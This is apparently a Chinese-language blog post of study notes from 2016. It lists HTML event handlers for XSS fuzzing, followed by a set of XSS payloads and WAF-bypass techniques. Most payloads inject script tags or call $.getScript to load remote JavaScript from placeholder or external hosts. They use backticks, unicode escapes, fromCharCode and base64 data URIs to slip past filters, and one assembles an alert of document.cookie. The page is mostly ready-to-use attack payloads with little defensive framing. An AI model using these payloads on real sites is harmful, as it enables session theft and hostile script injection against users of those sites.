A-A+

xss Fuzzy test 参数代码 及绕过WAF方式

2016年12月12日 11:06 学习笔记 暂无评论 共1341字 (阅读2,443 views次)

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

一系列XSSFuzll 参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
onerror
onload
onmouseenter
onstalled
onclick
onmousemove
onseeking
onvolumechange
onwaiting
onmouseover
onabort
onactivate
onafterprint
onafterupdate
onbeforeactivate
onbeforecopy
onbeforecut
onbeforedeactivate
onbeforeeditfocus
onbeforepaste
onbeforeprint
onbeforeunload
onbeforeupdate
onblur
onbounce
oncellchange
onchange
oncontextmenu
oncontrolselect
oncopy
oncut
ondataavailable
ondatasetchanged
ondatasetcomplete
ondblclick
ondeactivate
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
onerrorupdate
onfilterchange
onfinish
onfocus
onfocusin
onfocusout
onhelp
onkeydown
onkeypress
onkeyup
onlayoutcomplete
onlosecapture
onmousedown
onmouseleave
onmouseout
onmouseup
onmousewheel
onmove
onmoveend
onmovestart
onpaste
onpropertychange
onreadystatechange
onreset
onresize
onresizeend
onresizestart
onrowenter
onrowexit
onrowsdelete
onrowsinserted
onscroll
onselect
onselectionchange
onselectstart
onstart
onstop
onsubmit
onunload
oncanplay
onformchange
onforminput
onpause
onplay
onplaying
onratechange
onredo
onseeked

举例子绕过代码:
http://hotel.xxx.com/list?city=2500&&keyword="onfocus=$.getScript`//Baidu.com/HouZhui`%20
很多时候使用“`”来代替引号,即成为alert(`A`) 就可以绕过WAF

1
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//Baidu.com/HouZhui"></img>
1
<img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//Baidu.com/HouZhui’”></img>
1
<img src=1 onerror=jQuery.getScript("//Baidu.com/HouZhui")>
1
<img src="#" onerror="$.getScript(‘\u002f\u002fBaidu.com\u002fHouZhui‘)">
1
<img src="#" onerror="var a=String.fromCharCode(47);$.getScript(a+a+‘Baidu.com‘+a+‘HouZhui‘)">
1
<img src=‘0‘ onselect=with(document)body.appendChild(createElement(`script`)).src=`//Baidu.com/HouZhui`%20>
1
<img src=i onerror=eval(jQuery.getScript(‘//Baidu.com/HouZhui‘))>
1
<img src=1 onerror=setTimeout("ale".concat("rt(docum","ent.cookie",")"),0)>
1
2
3
4
5
6
7
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<object data='data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL2dkZC5nZC9qN00xPjwvc2NyaXB0Pg=='>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<object data='data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL2dkZC5nZC9qPjwvc2NyaXB0Pg=='>
<input onfocus=\u0064ocument.write(String.fromCharCode(60,115,67,82,105,80,116,32,115,82,67,61,104,116,116,112,58,47,47,120,121,108,46,108,105,102,101,47,106,62,60,47,115,67,114,73,112,84,62)) autofocus>
//测试无效
<img src=N onerror=eval(javascript:document.write(unescape(`<sCRiPt sRC=http://Baidu.com/HouZhui></sCrIpT>`));)>
1
2
3
4
5
<img src=x onerror=with(body)createElement('script').src='//gdd.gd/1'>
S1:通过img元素的src属性出错,执行onerror事件.
S2:用with定位到body,通过DOM的一个createElement方法创建一个script元素,并使用script的src属性指向需要调用的外部js文件。从而达到攻击的目的。
<img src=x onerror=document.body.appendChild(document.createElement(`script`)).src=`//Baidu.com/HouZhui`>
//测试无效
1
2
//测试无效
<img src="http://x.jpg" onload="s=document.createElement(‘script‘);s.src=‘http://Baidu.com/HouZhui‘+Math.random();document.body.appendChild(s)" border="0">

oncanplay xss

http://html5sec.org/

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×

给我留言